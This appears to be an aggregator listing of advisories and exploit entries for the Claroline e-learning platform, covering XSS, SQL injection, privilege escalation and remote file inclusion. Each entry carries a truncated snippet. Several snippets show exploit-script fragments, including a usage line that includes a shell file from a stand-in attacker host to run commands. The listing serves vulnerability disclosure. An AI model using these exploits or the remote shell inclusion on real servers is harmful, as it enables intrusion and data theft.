Claroline 1.5/1.6 user_access_details.php data Parameter XSS

No description provided by source. source: http://www.securityfocus.com/bid/13407/info Multiple remote input validation vulnerabilities affect Claroline e-Learning Application. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry...

Claroline e-Learning <= 1.6 - Remote Hash SQL Injection Exploit

No description provided by source. ?php T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m Vulnerable: Claroline E-Learning Application Exploit By : MHp0rtal Discovered By: Sieg Fried Gr33tz To == Alphaprogrammer , Oilkarchack , DrCephaleX , Str0ke And Iranian Hacking & Security Teams :...

Claroline 1.5/1.6 toolaccess_details.php tool Parameter XSS

No description provided by source. source: http://www.securityfocus.com/bid/13407/info Multiple remote input validation vulnerabilities affect Claroline e-Learning Application. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry...

Claroline 1.5/1.6 myagenda.php coursePath Parameter XSS

No description provided by source. source: http://www.securityfocus.com/bid/13407/info Multiple remote input validation vulnerabilities affect Claroline e-Learning Application. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry...

Claroline 1.5/1.6 userInfo.php Multiple Parameter SQL Injection

No description provided by source. source: http://www.securityfocus.com/bid/13407/info Multiple remote input validation vulnerabilities affect Claroline e-Learning Application. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry...

Claroline 1.5/1.6 exercises_details.php exo_id Parameter SQL Injection

No description provided by source. source: http://www.securityfocus.com/bid/13407/info Multiple remote input validation vulnerabilities affect Claroline e-Learning Application. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry...

Claroline e-Learning 1.8.1 Privilege Escalation Vulnerability

Due to insufficient permission checking in profile.php any user can assign hem or her self to any organization by issueing a single http request. Claroline users can assign themselves their platform role, leading to possible privilege escalation Description: Due to insufficient permission checkin...

Claroline Open Source e-Learning 1.7.5 Remote File Include

Description Vendor: http://www.claroline.net The file claroline/auth/extauth/drivers/ldap.inc.php uses the variable clarolineRepositorySys in a include function without being declared. There are other files vulnerable in the same folder, this exploit only attacks ldap.inc.php There is other...

Claroline e-Learning 1.75 (ldap.inc.php) Remote File Inclusion Exploit

No description provided by source. !/usr/bin/perl Claroline Open Source e-Learning 1.7.5 Remote File Include Exploit & Advisorie: beford xbefordx gmail com uso: perl own.pl host cmd-shell-url cmd-var perl own.pl http://host.com/claroline/auth/ http://atacante/shell.gif cmd cmd shell example: ?...

Claroline E-Learning 1.75 - ldap.inc.php Remote File Inclusion

Claroline E-Learning 1.75 - ldap.inc.php Remote File Inclusion !/usr/bin/perl Claroline Open Source e-Learning 1.7.5 Remote File Include Exploit & Advisorie: beford uso: perl own.pl perl own.pl http://host.com/claroline/auth/ http://atacante/shell.gif cmd cmd shell example: cmd variable: cmd;...

Claroline E-Learning 1.75 - &#039;ldap.inc.php&#039; Remote File Inclusion

!/usr/bin/perl Claroline Open Source e-Learning 1.7.5 Remote File Include Exploit & Advisorie: beford uso: perl own.pl perl own.pl http://host.com/claroline/auth/ http://atacante/shell.gif cmd cmd shell example: cmd variable: cmd; Description Vendor: http://www.claroline.net The file...

claroline16.txt

Alphaprogrammer , Oilkarchack , DrCephaleX , Str0ke And Iranian Hacking & Security Teams : IHS TeaM , alphaST , Shabgard Security Team , Emperor Hacking Team , Crouz Security Team & Simorgh-ev Security Team Config : please replace your address : $url = "http:///www.example.com"; Please replace yo...

[EXPL] Claroline E-Learning Application Remote SQL Injection

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source...

Claroline e-Learning <= 1.6 Remote Hash SQL Injection Exploit (2)

Exploit for unknown platform in category web applications ================================================================= Claroline e-Learning \n"; print STDERR "Targets:\n1 - userInfo.php\n"; print STDERR "2 - exercisesdetails.php\n"; exit; if @ARGV 3 Usage; if @ARGV == 3 $host = @ARGV0; $path...

Claroline E-Learning 1.6 - Remote Hash SQL Injection (2)

Claroline E-Learning 1.6 - Remote Hash SQL Injection 2 !/usr/bin/perl Claroline E-Learning Application Remote SQL Exploit K-C0d3r This tools and to consider only himself to educational purpose Bug discovered by Greetz to mZ, 2b TUBE, off, rikky, str0ke, x0n3-h4ck, MWC K-C0d3r use IO::Socket; sub...

Claroline e-Learning <= 1.6 Remote Hash SQL Injection Exploit

Exploit for unknown platform in category web applications ============================================================= Claroline e-Learning Alphaprogrammer , Oilkarchack , DrCephaleX , Str0ke And Iranian Hacking & Security Teams : IHS TeaM , alphaST , Shabgard Security Team , Emperor Hacking Tea...

Claroline E-Learning 1.6 - Remote Hash SQL Injection (1)

Alphaprogrammer , Oilkarchack , DrCephaleX , Str0ke And Iranian Hacking & Security Teams : IHS TeaM , alphaST , Shabgard Security Team , Emperor Hacking Team , Crouz Security Team & Simorgh-ev Security Team Config : please replace your address : $url = "http:///www.example.com"; Please replace yo...

Claroline e-Learning &lt;= 1.6 Remote Hash SQL Injection Exploit

No description provided by source. ?php T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m Vulnerable: Claroline E-Learning Application Exploit By : MHp0rtal Discovered By: Sieg Fried Gr33tz To == Alphaprogrammer , Oilkarchack , DrCephaleX , Str0ke And Iranian Hacking & Security Teams :...

Claroline E-Learning 1.51.6 - exercises_details.php?exo_id SQL Injection

Claroline E-Learning 1.51.6 - exercisesdetails.php?exoid SQL Injection source: https://www.securityfocus.com/bid/13407/info Multiple remote input validation vulnerabilities affect Claroline e-Learning Application. These issues are due to a failure of the application to properly sanitize...

Claroline E-Learning 1.51.6 - userInfo.php Multiple SQL Injections

Claroline E-Learning 1.51.6 - userInfo.php Multiple SQL Injections source: https://www.securityfocus.com/bid/13407/info Multiple remote input validation vulnerabilities affect Claroline e-Learning Application. These issues are due to a failure of the application to properly sanitize user-supplied...